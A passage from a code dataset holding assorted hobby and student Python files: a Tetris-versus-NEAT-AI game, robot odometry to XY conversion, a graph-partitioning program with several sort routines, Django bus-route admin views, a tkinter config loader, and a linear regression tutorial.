= f['particles/janus/velocity/value'][...]\n v_dt = f['particles/janus/velocity/time'][()]\n edges = f['particles/janus/box/edges'][:].reshape((1,-1))\n\nr += edges*im\n\nassert abs(r_dt-v_dt) < 1e-12\nassert r.shape[1]==36\nassert r.shape[2]==3\nassert v.shape[1]==36\nassert v.shape[2]==3\n\ntime = np.arange(r.shape[0])*r_dt\n\nv_com = v.mean(axis=1)\n\nif args.directed:\n unit_z = r[:,:18,:].mean(axis=1)-r[:,18:,:].mean(axis=1)\n unit_z /= np.sqrt(np.sum(unit_z**2, axis=1)).reshape((-1,1))\n vz = np.sum(v_com*unit_z, axis=1)\n if args.histogram:\n plt.hist(vz, bins=20)\n else:\n plt.plot(time, vz)\nelse:\n for i in range(3):\n plt.subplot(3,1,i+1)\n if args.histogram:\n plt.hist(v_com[:,i]) \n plt.ylabel(r'$P(v_'+'xyz'[i]+')$')\n else:\n plt.plot(time, v_com[:,i])\n plt.ylabel('xyz'[i])\n\nplt.show()\n","sub_path":"experiments/03-single-janus/plot_velocity.py","file_name":"plot_velocity.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"389172689","text":"import pygame\nfrom core.entities 
import Tetris\n\nimport os\nimport pickle\nimport neat\n\nfrom core.utilities import try_possible_moves\n\nclass VsAIRunner:\n\tdef __init__(self, width=10, height=20, debug_mode=False, cell_size=50):\n\t\tself.width = width\n\t\tself.height = height\n\t\tself.cell_size = cell_size\n\t\tself.debug_mode = debug_mode\n\t\tself.humanPlayer = Tetris(self.width, self.height, debug_mode=debug_mode)\n\t\tself.aiPlayer = Tetris(self.width, self.height, debug_mode=debug_mode)\n\t\tpygame.init()\n\t\tpygame.display.set_caption('Open Tetris')\n\t\tself.clock = pygame.time.Clock()\n\t\tself.screen = pygame.display.set_mode([(2 * width + 1) * self.cell_size, (height + 3) * self.cell_size])\n\t\tself.tick = 0\n\t\tself.ai_tick = 0\n\n\t\t# open the winner genome file\n\t\twith open(\"./single_player/winner.pickle\", 'rb') as genome_file:\n\t\t\t# load the winner genome to the genome variable\n\t\t\tgenome = pickle.load(genome_file)\n\n\t\t# name of directory containing this file\n\t\tlocal_dir = os.path.dirname(__file__)\n\t\t# path to the config file\n\t\tconfig_path = './single_player/config.txt'\n\t\t# extract details from the config file\n\t\tconfig = neat.config.Config(neat.DefaultGenome, neat.DefaultReproduction,\n\t\t neat.DefaultSpeciesSet, neat.DefaultStagnation,\n\t\t config_path)\n\t\t# model corresponding to the winning genome\n\t\tself.model = neat.nn.FeedForwardNetwork.create(genome, config)\n\n\tdef new_game(self):\n\t\tself.humanPlayer = Tetris(self.width, self.height, debug_mode=self.debug_mode)\n\t\tself.aiPlayer = Tetris(self.width, self.height, debug_mode=self.debug_mode)\n\t\tself.tick = 0\n\t\tself.ai_tick = 0\n\t\tself.erase_board()\n\n\tdef erase_board(self):\n\t\tself.screen.fill((0, 0, 0))\n\n\tdef draw_grid(self, xOffset):\n\t\tfor i in range(self.width-1):\n\t\t\tpygame.draw.rect(self.screen, (100,100,100), pygame.Rect(i * self.cell_size + self.cell_size - 2 + xOffset, 3*self.cell_size, 4, (self.height+3)*self.cell_size))\n\t\tfor i in range(self.height+2):\n\t\t\tif i > 1:\n\t\t\t\tpygame.draw.rect(self.screen, (100,100,100), pygame.Rect(xOffset, i * self.cell_size + self.cell_size - 2, self.width*self.cell_size, 4))\n\n\tdef display_board(self, p1Name=\"Human\"):\n\t\tp1_data = self.humanPlayer.get_board()\n\t\tp2_data = self.aiPlayer.get_board()\n\n\t\tfor y in range(len(p1_data)):\n\t\t\tfor x in range(len(p1_data[y])):\n\t\t\t\tcell = p1_data[y][x]\n\t\t\t\tpygame.draw.rect(self.screen, cell, pygame.Rect(x * self.cell_size, (self.height - y + 2) * self.cell_size, self.cell_size, self.cell_size))\n\n\t\tfor y in range(len(p2_data)):\n\t\t\tfor x in range(len(p2_data[y])):\n\t\t\t\tcell = p2_data[y][x]\n\t\t\t\tpygame.draw.rect(self.screen, cell, pygame.Rect(x * self.cell_size + self.width * self.cell_size + self.cell_size, (self.height - y + 2) * self.cell_size, self.cell_size, self.cell_size))\n\n\t\tpygame.draw.rect(self.screen, (150, 150, 150), pygame.Rect(self.width * self.cell_size, 0, self.cell_size, self.cell_size * (self.height+3)))\n\t\tself.draw_grid(0)\n\t\tself.draw_grid(self.width * self.cell_size + self.cell_size)\n\n\t\tpygame.display.flip()\n\n\t\tpygame.display.set_caption(\"Open Tetris | \" + p1Name + \" Score: \" + str(self.humanPlayer.get_score()) + \", \"\n\t\t + str(self.humanPlayer.board.get_lines_cleared()) + \" lines cleared | SP AI Score: \"\n\t\t + str(self.aiPlayer.get_score()) + \", \"\n\t\t + str(self.aiPlayer.board.get_lines_cleared())\n\t\t + \" lines cleared\")\n\n\tdef display_winner(self, p1Name=\"Human\"):\n\t\tannouncement = p1Name + 
\" Wins!\"\n\t\tif self.aiPlayer.get_score() > self.humanPlayer.get_score():\n\t\t\tannouncement = \"AI Wins!\"\n\t\tprint(announcement)\n\t\tpygame.display.set_caption(announcement\n\t\t\t\t\t\t\t\t\t+ \" | Open Tetris | \" + p1Name + \" Score: \" + str(self.humanPlayer.get_score()) + \", \"\n\t\t + str(self.humanPlayer.board.get_lines_cleared()) + \" lines cleared | SP AI Score: \"\n\t\t + str(self.aiPlayer.get_score()) + \", \"\n\t\t + str(self.aiPlayer.board.get_lines_cleared())\n\t\t + \" lines cleared\")\n\n\tdef wait_for_input(self):\n\t\ttick = 0\n\t\twhile tick < 160:\n\t\t\ttick += 1\n\t\t\tself.clock.tick(40)\n\n\t\tfor event in pygame.event.get():\n\t\t\tpass\n\t\tevents = 0\n\t\twhile events == 0:\n\t\t\tfor event in pygame.event.get():\n\t\t\t\tevents += 1\n\t\t\tself.clock.tick(40)\n\n\tdef ai_choose_move(self):\n\t\tpossible_moves_result = try_possible_moves(self.aiPlayer, self.model)\n\t\t# if list is not empty\n\t\tif possible_moves_result:\n\t\t\t# best moves correspond to 0th position because of descending sort\n\t\t\tself.aiPlayer.goalRotation, self.aiPlayer.goalX, _ = possible_moves_result[0]\n\t\t\treturn True\n\t\treturn False\n\n\tdef ai_move(self):\n\t\tif not self.aiPlayer.is_failed():\n\t\t\tif self.aiPlayer.goalRotation is None:\n\t\t\t\tself.ai_choose_move()\n\t\t\tif self.aiPlayer.piece.shape != self.aiPlayer.goalRotation.shape:\n\t\t\t\tsuccess = self.aiPlayer.rotate_piece()\n\t\t\t\tif not success:\n\t\t\t\t\tself.ai_choose_move()\n\t\t\telif self.aiPlayer.goalX != self.aiPlayer.piece.center[0]:\n\t\t\t\tif self.aiPlayer.goalX > self.aiPlayer.piece.center[0]:\n\t\t\t\t\tsuccess = self.aiPlayer.move_piece(\"right\")\n\t\t\t\telse:\n\t\t\t\t\tsuccess = self.aiPlayer.move_piece(\"left\")\n\t\t\t\tif not success:\n\t\t\t\t\tself.ai_choose_move()\n\t\t\telse:\n\t\t\t\tself.aiPlayer.snap_piece()\n\t\t\t\tself.aiPlayer.goalRotation = None\n\t\t\t\tself.aiPlayer.goalX = None\n\n\tdef get_input(self):\n\t\thumanMove = False\n\t\tp1_total_lines_cleared = self.humanPlayer.board.lines_cleared\n\t\tp2_total_lines_cleared = self.aiPlayer.board.lines_cleared\n\n\t\tif not self.humanPlayer.is_failed():\n\t\t\t#Get event inputs (keydowns)\n\t\t\tfor event in pygame.event.get():\n\t\t\t\tif event.type == pygame.QUIT:\n\t\t\t\t\tpygame.quit()\n\t\t\t\t\texit()\n\t\t\t\tif event.type == pygame.KEYDOWN:\n\t\t\t\t\tif event.key == pygame.K_a:\n\t\t\t\t\t\thumanMove = self.humanPlayer.move_piece('left')\n\t\t\t\t\t\tself.tick = 0\n\t\t\t\t\telif event.key == pygame.K_w:\n\t\t\t\t\t\tself.tick = 0\n\t\t\t\t\t\thumanMove = self.humanPlayer.snap_piece()\n\t\t\t\t\telif event.key == pygame.K_s:\n\t\t\t\t\t\tself.tick = 0\n\t\t\t\t\t\thumanMove = self.humanPlayer.move_piece('down')\n\t\t\t\t\telif event.key == pygame.K_d:\n\t\t\t\t\t\tself.tick = 0\n\t\t\t\t\t\thumanMove = self.humanPlayer.move_piece('right')\n\t\t\t\t\telif event.key == pygame.K_r:\n\t\t\t\t\t\tself.tick = 0\n\t\t\t\t\t\thumanMove = self.humanPlayer.rotate_piece()\n\n\t\t\tself.tick = self.tick + 1\n\n\t\t\t#Player 1 ticks\n\t\t\tif self.tick > 5:\n\t\t\t\tkeys = pygame.key.get_pressed()\n\t\t\t\tif keys[pygame.K_a]:\n\t\t\t\t\thumanMove = self.humanPlayer.move_piece('left')\n\t\t\t\t\tself.tick = 0\n\t\t\t\telif keys[pygame.K_d]:\n\t\t\t\t\thumanMove = self.humanPlayer.move_piece('right')\n\t\t\t\t\tself.tick = 0\n\t\t\t\telif keys[pygame.K_s]:\n\t\t\t\t\thumanMove = self.humanPlayer.move_piece('down')\n\t\t\t\t\tself.tick = 0\n\t\t\tif self.tick > 45:\n\t\t\t\thumanMove = 
self.humanPlayer.move_piece('down')\n\t\t\t\tself.tick = 0\n\n\t\tif not self.aiPlayer.is_failed():\n\t\t\tself.ai_tick += 1\n\t\t\tif self.ai_tick > 20:\n\t\t\t\tself.ai_tick = 0\n\t\t\t\tself.ai_move()\n\n\t\tp1_line_clears = self.humanPlayer.board.lines_cleared - p1_total_lines_cleared\n\t\tp2_line_clears = self.aiPlayer.board.lines_cleared - p2_total_lines_cleared\n\n\t\tif not self.aiPlayer.is_failed():\n\t\t\tif p1_line_clears == 2:\n\t\t\t\tself.aiPlayer.add_opponent_lines(1)\n\t\t\telif p1_line_clears == 3:\n\t\t\t\tself.aiPlayer.add_opponent_lines(2)\n\t\t\telif p1_line_clears == 4:\n\t\t\t\tself.aiPlayer.add_opponent_lines(4)\n\n\t\tif not self.humanPlayer.is_failed():\n\t\t\tif p2_line_clears == 2:\n\t\t\t\tself.humanPlayer.add_opponent_lines(1)\n\t\t\telif p2_line_clears == 3:\n\t\t\t\tself.humanPlayer.add_opponent_lines(2)\n\t\t\telif p2_line_clears == 4:\n\t\t\t\tself.humanPlayer.add_opponent_lines(4)\n\n\t\t\tself.clock.tick(40)\n\n\tdef play(self):\n\t\twhile True:\n\t\t\twhile not (self.humanPlayer.is_failed() and self.aiPlayer.is_failed()):\n\t\t\t\tself.display_board()\n\t\t\t\tself.get_input()\n\t\t\t\tself.erase_board()\n\t\t\tself.erase_board()\n\t\t\tself.display_board()\n\t\t\tself.display_winner()\n\t\t\tself.wait_for_input()\n\t\t\tself.new_game()\n","sub_path":"runners/vs_ai_runner.py","file_name":"vs_ai_runner.py","file_ext":"py","file_size_in_byte":7828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"414117815","text":"import csv\nfrom math import cos, sin, radians\ninput_file=\"wheelData.csv\"\nanglist = []\ndistlist=[]\nxlist=[]\nylist=[]\nprevx=0\nprevy=0\ntotangle=0\nwith open(input_file,\"rb\") as pos_input:\n\tcsv_reader = csv.reader(pos_input)\n\tcsv_reader.next()\n\tfor row in csv_reader:\n angle=float(row[0])\n #print angle\n distance=float(row[1])\n #print distance\n anglist.append(angle)\n distlist.append(distance)\n\n\nfor i in range(len(distlist)):\n ang=anglist[i]\n dist=distlist[i]\n ang = -ang\n tempx=dist*(sin(radians(ang)))\n tempy=dist*cos(radians(ang)) \n #print str(tempx) + \" \" + str(tempy)\n x=tempx*cos(radians(totangle))+tempy*sin(radians(totangle))\n y=-tempx*sin(radians(totangle))+tempy*cos(radians(totangle))\n x = x + prevx\n y = y + prevy\n totangle = totangle - ang\n prevx = x\n prevy = y\n #print (\"Total Angle: \", totangle)\n xlist.append(y)\n ylist.append(x)\n #print \"X: \",x\n #print \"Y: \",y\n\nfilehandle=open(\"generatedXY.csv\",\"w\")\nwriter = csv.writer(filehandle)\nwriter.writerow([\"x\",\"y\"])\nfor i in range(len(xlist)):\n x=xlist[i]\n y=ylist[i]\n writer.writerow([x,y])\nfilehandle.close() \n'''\n if(totangle>360):\n totangle=totangle-360\n if(totangle>=0 and totangle<90):\n x=x\n y=y\n if(totangle==90):\n x=prevx+x\n y=prevyy\n if(totangle>90 and totangle<180):\n x=prevx-x\n y=prevy+y\n if(totangle==180):\n x=x\n y=prevy-y\n if(totangle>180 and totangle<270):\n x=prevx+x\n y=prevy+y\n if(totangle==270):\n x=prevx-x\n y=y\n if(totangle>270 and totangle<360):\n x=prevx-x\n y=prevy+y\n \n prevx=x\n prevy=y\n''' \n \n \n","sub_path":"ROS_Robot_Trajectory_Planning_and_Navigation/trajectory_pkg/scriptrs/generatepoints.py","file_name":"generatepoints.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"372376307","text":"\r\n\r\nimport pipa\r\nfrom pipa import PipelineItem\r\n\r\nclass MakeItem(PipelineItem):\r\n def __init__(self, *args, **kwargs):\r\n super(MakeItem, 
self).__init__(*args, **kwargs)\r\n self.name = 'make_item'\r\n\r\n def generator(self, input_list, func=None, func_kwargs={}):\r\n for input in input_list:\r\n item = func(input, **func_kwargs)\r\n self.logger.debug(item)\r\n yield item","sub_path":"pipa/util/item/make_item.py","file_name":"make_item.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"529839224","text":"import configparser\nimport os.path\nimport tkinter as tk\n\nclass Config(object):\n global general_setting, style_setting, style\n def __init__(self):\n global general_settings\n settings_path = \"settings/settings.ini\"\n settings_exists = os.path.exists(settings_path)\n if settings_exists == True:\n\n print(\"Файл конфигуряции основных настроек найден\")\n general_settings = configparser.ConfigParser() # создаём объекта парсера\n general_settings.read(settings_path) # читаем конфиг\n general_setting(self)\n style(self)\n Window()\n else:\n print(\"Проверьте существование файла\")\n\n def style(self):\n global style_settings\n style_path = \"settings/style.ini\"\n style_exists = os.path.exists(style_path)\n if style_exists == True:\n print(\"Файл конфигуряции настроек стиля найден\")\n style_settings = configparser.ConfigParser()\n style_settings.read(style_path)\n style_setting(self)\n else:\n print(\"Проверьте существование файла\")\n\n\n def general_setting(self):\n global Debug, Height, Width\n Debug = general_settings[\"General\"][\"Debug\"]\n Height = general_settings[\"General\"][\"Height\"]\n Width = general_settings[\"General\"][\"Width\"]\n print(Debug, Height, Width)\n\n def style_setting(self):\n global Foreground_main, Background_main, Height_main, Width_main\n Foreground_main = style_settings[\"Label\"][\"Foreground_main\"]\n Background_main = style_settings[\"Label\"][\"Background_main\"]\n Height_main = style_settings[\"Label\"][\"Height_main\"]\n Width_main = style_settings[\"Label\"][\"Width_main\"]\n print(Foreground_main, Background_main)\n\nclass Window(Config):\n global text\n ##Основное окно\n def __init__(self):\n window_main = tk.Tk()\n text(self)\n window_main.mainloop()\n\n ##Текст\n def text(self):\n label = tk.Label(text=\"Python рулит!\",\n foreground=Foreground_main,\n background=Background_main,\n height=Height_main,\n width=Width_main\n )\n\n label.pack()\n\nConfig()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"212750469","text":"\"\"\"\nAssorted Functions.\n\"\"\"\n\nimport skilstak.colors as c\n\ndef go(clear):\n if clear == 0:\n print(c.clear)\n elif clear == 1:\n print()\n print()\n print()\n truefalse = \"*/*';*d*ad*\"\n\n while truefalse == \"*/*';*d*ad*\":\n truefalse = input(c.blue + 'press any key to continue ' + c.magenta)\n\n print(c.green + 'ok!' 
+ c.reset)\n print(c.clear)\n \ndef space(nums):\n num = 0\n while num <= nums:\n print()\n num = num + 1\n\n'''\ndef err:\n\n\n'''\n\n'''\ndef question(sentence, question, ans1, ans2, ans3, cAns, pts) :\n questionCorrect = 0\n numWrong = 0\n\n while questionCorrect == 0:\n print(c.green + sentence)\n print()\n print(c.red + question)\n print()\n print(c.red + 'A: ' + c.yellow + ans1)\n print(c.red + 'B: ' + c.yellow + ans2)\n print(c.red + 'C: ' + c.yellow + ans3)\n print()\n answer = input(c.blue + 'Select the letter: ').strip().lower()\n\n if answer == cAns:\n print(c.green + 'CORRECT!')\n questionCorrect = 1\n pts +=\n else:\n print(c.green + 'Not quite, try again...')\n\n go(0)\n\n'''\n\n\n\n\n","sub_path":"systems.py","file_name":"systems.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"28086316","text":"from connection import Connection\r\nimport timeit\r\nimport sys\r\nimport threading\r\n\r\n\r\n\r\ndef main():\r\n inp = input(\"Enter your command:\\n\")\r\n time = {}\r\n\r\n start = timeit.default_timer()\r\n sort_func = inp.split()[1]\r\n path = inp.split()[2]\r\n p = path\r\n path = \"./\" + path\r\n file = open(path)\r\n text_input = file.read()\r\n file.close()\r\n txt_list = []\r\n t = text_input.split(\"\\n\")\r\n for row in t:\r\n txt_list.append(row.split())\r\n\r\n vertex_pair = []\r\n for element in txt_list:\r\n vertex_pair.append([int(element[0]), int(element[1])])\r\n\r\n length = vertex_pair[len(vertex_pair) - 1][0] + 1\r\n neighbor_list = [[] for _ in range(length)]\r\n\r\n for edge in vertex_pair:\r\n neighbor_list[edge[0]].append(edge[1])\r\n # print(neighbor_list[1], neighbor_list[44])\r\n\r\n stop = timeit.default_timer()\r\n time.update({\"Read file and create neighbor-list time\": start - stop})\r\n\r\n conn = Connection(length, neighbor_list)\r\n start = timeit.default_timer()\r\n cij_dict = initially_score_calculator(neighbor_list)\r\n stop = timeit.default_timer()\r\n time.update({\"Calculating initial scores time\": start - stop})\r\n sys.setrecursionlimit(10 ** 9)\r\n partitioned_graph = graph_union(cij_dict, neighbor_list, conn, sort_func)\r\n f = open(\"result-\" + p, \"w\")\r\n for i in range(1, len(partitioned_graph)):\r\n if partitioned_graph[i]:\r\n f.write(str(i) + \"\\t\" + \"A\\n\")\r\n else:\r\n f.write(str(i) + \"\\t\" + \"B\\n\")\r\n f.close()\r\n\r\n print(time)\r\n\r\n\r\ndef initially_score_calculator(neighbor_list):\r\n c_ij = {}\r\n for i_vertex in range(1, len(neighbor_list)):\r\n for j_vertex in neighbor_list[i_vertex]:\r\n if ([i_vertex, j_vertex] not in list(c_ij.keys())) and \\\r\n ([j_vertex, i_vertex] not in list(c_ij.keys())):\r\n k_i = len(neighbor_list[i_vertex])\r\n k_j = len(neighbor_list[j_vertex])\r\n min_k = min(k_i - 1, k_j - 1)\r\n if min_k == 0:\r\n score = float('inf')\r\n else:\r\n score = (zij(i_vertex, j_vertex, neighbor_list) + 1) / min(k_i - 1, k_j - 1)\r\n c_ij.update({(i_vertex, j_vertex): score})\r\n # print(\"{}-{}: \".format(i_vertex, j_vertex), score)\r\n return c_ij\r\n\r\n\r\n# def zij(neighbor_list):\r\n# z_dict = {}\r\n# for i_vertex in range(1, len(neighbor_list)):\r\n# for j_vertex in neighbor_list[i_vertex]:\r\n# if (str(i_vertex) + \"-\" + str(j_vertex) not in list(z_dict.keys())) and \\\r\n# (str(j_vertex) + \"-\" + str(i_vertex) not in list(z_dict.keys())):\r\n# tmp_list = [value for value in neighbor_list[i_vertex] if value in neighbor_list[j_vertex]]\r\n# z_dict.update({str(i_vertex) + \"-\" + 
str(j_vertex): len(tmp_list)})\r\n#     return z_dict\r\n\r\n\r\ndef zij(i_vertex, j_vertex, neighbor_list):\r\n    z_dict = {}\r\n    # if (str(i_vertex) + \"-\" + str(j_vertex) not in list(z_dict.keys())) and \\\r\n    #         (str(j_vertex) + \"-\" + str(i_vertex) not in list(z_dict.keys())):\r\n    tmp_list = [value for value in neighbor_list[i_vertex] if value in neighbor_list[j_vertex]]\r\n    # z_dict.update({str(i_vertex) + \"-\" + str(j_vertex): len(tmp_list)})\r\n\r\n    return len(tmp_list)\r\n\r\n\r\ndef graph_union(cij_dict, neighbor_list, conn, sort_func):\r\n    if sort_func == \"Bubble\":\r\n        sorted_values = bubbleSort(list(cij_dict.values()))\r\n    elif sort_func == \"Quick\":\r\n        # the original compared against \"Quick \" (with a trailing space), which could\r\n        # never match; quick_sort also sorts in place, so the sorted list is lst itself\r\n        lst = list(cij_dict.values())\r\n        quick_sort(lst, 0, len(lst) - 1)\r\n        sorted_values = lst\r\n    elif sort_func == \"Merge\":\r\n        sorted_values = mergeSort(list(cij_dict.values()))\r\n    elif sort_func == \"Insertion\":\r\n        sorted_values = insertion_sort(list(cij_dict.values()))\r\n    else:\r\n        raise ValueError(\"unknown sort function: \" + sort_func)\r\n\r\n    key_min = get_key(sorted_values[0], cij_dict)\r\n    cij_dict.pop(key_min)\r\n    i_vertex, j_vertex = key_min[0], key_min[1]\r\n    f, partitioned_graph = conn.is_bridge(i_vertex, j_vertex)\r\n    print(key_min)\r\n    if f:\r\n        if j_vertex in neighbor_list[i_vertex]:\r\n            neighbor_list[i_vertex].remove(j_vertex)\r\n        if i_vertex in neighbor_list[j_vertex]:\r\n            neighbor_list[j_vertex].remove(i_vertex)\r\n        partitioned_graph[j_vertex] = False\r\n        return partitioned_graph\r\n\r\n    if j_vertex in neighbor_list[i_vertex]:\r\n        neighbor_list[i_vertex].remove(j_vertex)\r\n    if i_vertex in neighbor_list[j_vertex]:\r\n        neighbor_list[j_vertex].remove(i_vertex)\r\n\r\n    for vertex in neighbor_list:\r\n        if (i_vertex in vertex) or (j_vertex in vertex):\r\n            pass\r\n    for key in list(cij_dict.keys()):\r\n        if (i_vertex in key) or (j_vertex in key):\r\n            k_i = len(neighbor_list[key[0]])\r\n            k_j = len(neighbor_list[key[1]])\r\n            min_k = min(k_i - 1, k_j - 1)\r\n            if min_k == 0:\r\n                score = float('inf')\r\n            else:\r\n                score = (zij(i_vertex=key[0], j_vertex=key[1], neighbor_list=neighbor_list) + 1) / min(k_i - 1, k_j - 1)\r\n            cij_dict[key] = score\r\n    # propagate the final partition back up the recursion (the original dropped it)\r\n    return graph_union(cij_dict, neighbor_list, conn, sort_func)\r\n\r\n\r\ndef get_key(val, dic):\r\n    for key, value in dic.items():\r\n        if val == value:\r\n            return key\r\n\r\n    return \"key doesn't exist\"\r\n\r\n\r\ndef bubbleSort(arr):\r\n    n = len(arr)\r\n\r\n    # Traverse through all array elements\r\n    for i in range(n - 1):\r\n        # range(n) also work but outer loop will repeat one time more than needed.\r\n\r\n        # Last i elements are already in place\r\n        for j in range(0, n - i - 1):\r\n\r\n            # traverse the array from 0 to n-i-1\r\n            # Swap if the element found is greater\r\n            # than the next element\r\n            if arr[j] > arr[j + 1]:\r\n                arr[j], arr[j + 1] = arr[j + 1], arr[j]\r\n    return arr\r\n\r\n\r\ndef insertion_sort(array):\r\n    for index in range(1, len(array)):\r\n        currentValue = array[index]\r\n        currentPosition = index\r\n\r\n        while currentPosition > 0 and array[currentPosition - 1] > currentValue:\r\n            array[currentPosition] = array[currentPosition - 1]\r\n            currentPosition = currentPosition - 1\r\n\r\n        array[currentPosition] = currentValue\r\n    return array\r\n\r\n\r\ndef partition(array, start, end):\r\n    pivot = array[start]\r\n    low = start + 1\r\n    high = end\r\n\r\n    while True:\r\n        while low <= high and array[high] >= pivot:\r\n            high = high - 1\r\n\r\n        # Opposite process of the one above\r\n        while low <= high and array[low] <= pivot:\r\n            low = low + 1\r\n\r\n        if low <= high:\r\n            array[low], array[high] = array[high], array[low]\r\n            # The loop continues\r\n        else:\r\n            
# We exit out of the loop\r\n break\r\n\r\n array[start], array[high] = array[high], array[start]\r\n\r\n return high\r\n\r\n\r\ndef quick_sort(array, start, end):\r\n if start >= end:\r\n return array\r\n\r\n p = partition(array, start, end)\r\n quick_sort(array, start, p - 1)\r\n quick_sort(array, p + 1, end)\r\n\r\n\r\ndef dfs(v, visited, neighbor_list, i, j):\r\n if v == i:\r\n return \"A\"\r\n elif v == j:\r\n return \"B\"\r\n # Mark the current node as\r\n # visited and print it\r\n visited[v] = True\r\n\r\n # Recur for all the vertices\r\n # adjacent to this vertex\r\n i = 0\r\n while i != len(neighbor_list[v]):\r\n if (not visited[neighbor_list[v][i]]):\r\n dfs(neighbor_list[v][i], visited)\r\n i += 1\r\n\r\n\r\n# Python program for implementation of MergeSort\r\ndef mergeSort(arr):\r\n if len(arr) > 1:\r\n\r\n # Finding the mid of the array\r\n mid = len(arr) // 2\r\n\r\n # Dividing the array elements\r\n L = arr[:mid]\r\n\r\n # into 2 halves\r\n R = arr[mid:]\r\n\r\n # Sorting the first half\r\n mergeSort(L)\r\n\r\n # Sorting the second half\r\n mergeSort(R)\r\n\r\n i = j = k = 0\r\n\r\n # Copy data to temp arrays L[] and R[]\r\n while i < len(L) and j < len(R):\r\n if L[i] < R[j]:\r\n arr[k] = L[i]\r\n i += 1\r\n else:\r\n arr[k] = R[j]\r\n j += 1\r\n k += 1\r\n\r\n # Checking if any element was left\r\n while i < len(L):\r\n arr[k] = L[i]\r\n i += 1\r\n k += 1\r\n\r\n while j < len(R):\r\n arr[k] = R[j]\r\n j += 1\r\n k += 1\r\n return arr\r\n\r\n\r\nif __name__ == '__main__':\r\n sys.setrecursionlimit(10 ** 9)\r\n threading.Thread(target=main).start()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"497193662","text":"from ..models import *\nfrom django.shortcuts import render\nfrom django.http import JsonResponse\nimport json\n\ndef getAdminPage(request):\n cities = City.objects.all()\n types = Type.objects.all()\n stations = BusStation.objects.all()\n\n context = {'cities': cities, 'types': types, 'stations': stations}\n return render(request, 'stationsAdminPage.html', context)\n\ndef addStation(request):\n station = BusStation()\n station.name = request.POST['name']\n station.direction = request.POST['direction']\n station.city = City.objects.get(id = request.POST['cityId'])\n station.save()\n return JsonResponse({'id':station.id})\n\ndef addRoute(request):\n bus = Bus()\n bus.number = request.POST['number']\n bus.name = request.POST['routeName']\n bus.type = Type.objects.get(id = request.POST['typeId'])\n bus.city = City.objects.get(id = request.POST['cityId'])\n\n bus.save() \n stations = json.loads(request.POST['stations'])\n print(stations)\n prev_st = None\n for index, station in enumerate(stations):\n route = Route()\n route.bus = bus\n if index != 0:\n route.current_station = BusStation.objects.get(id = prev_st['id'])\n route.next_station = BusStation.objects.get(id = station['id']) \n prev_st = station\n route.save()\n route = Route()\n route.bus = bus\n route.current_station = BusStation.objects.get(id = prev_st['id'])\n route.save()\n return JsonResponse({'status':'SUCCESS'})\n\n \n \n \n\n","sub_path":"buses/handlers/stationsAdminService.py","file_name":"stationsAdminService.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"353449741","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom 
django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('catalog', '0003_auto_20160112_1951'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='product',\n name='quantity',\n field=models.IntegerField(default=0, verbose_name=b'\\xd0\\x9a\\xd0\\xbe\\xd0\\xbb\\xd0\\xb8\\xd1\\x87\\xd0\\xb5\\xd1\\x81\\xd1\\x82\\xd0\\xb2\\xd0\\xbe \\xd0\\xbd\\xd0\\xb0 \\xd1\\x81\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd0\\xb5'),\n ),\n ]\n","sub_path":"catalog/migrations/0004_product_quantity.py","file_name":"0004_product_quantity.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"622900210","text":"# Simple Linear Regression\n# Is based on the formula y = b0 + b1*x\n# y = Dependent variable (something you are trying to understand on how it depends on\n# something else)\n# x = Independent variable (causing the dependent variable to change or having an implied\n# association with the dependent variable)\n# b1 = coefficient (how the IV changes)\n# b0 = constant\n\n# y_^i = modeled value of DI y_i (the value that is on the modeled regression line)\n# Linear Regression: min(sum(y_i - y_^i)^2)\n\n# Multiple Linear Regression\n# y = b0 + b1*x1 + b2*x2 + ... + bn*xn\n\n# To handle categorical variables (i.e. State) we need to create dummy variables\n# For every single categorical value we need to create a separate column for each,\n# populating it with 1/0 values\n\n# Whenever building a model, always omit one dummy variable, no matter how many variables\n# there are in the set\n# If there are multiple dummy variable sets, apply this to each set\n\n# Importing the library\n\nimport numpy as np\n# Plot graphics\nimport matplotlib.pyplot as plt\n# Import and manage datasets\nimport pandas as pd\n\n# Importing the dataset\ndataset = pd.read_csv('50_Startups.csv')\n\n# Creating the matrix of features\n# We take values of all the columns except the last one\nx = dataset.iloc[:,:-1].values\nprint(x)\n\n# Creating the depending variable vector\ny = dataset.iloc[:, 4].values\nprint(y)\n\n\n# Encoding categorical data\n# Encoding the independent variables\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nlabel_encoder_x = LabelEncoder()\n# We encode the states (column 4)\nx[:, 3] = label_encoder_x.fit_transform(x[:, 3])\n# We change the text to numbers\none_hot_encoder = OneHotEncoder(categorical_features=[3])\nx = one_hot_encoder.fit_transform(x).toarray()\nprint(x)\n\n\n# Avoiding the dummy variable trap - we exclude the first column\nx = x[:, 1:]\nprint(x)\n\n\n# Splitting dataset into Training set and Test set\n# We need a dataset to train the model and one to test it against\nfrom sklearn.cross_validation import train_test_split\n# test/train size is portion of the dataset to included in test/train split\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, random_state=0)\n\n\n# Fitting Multiple Linear Regression to the Training Set\nfrom 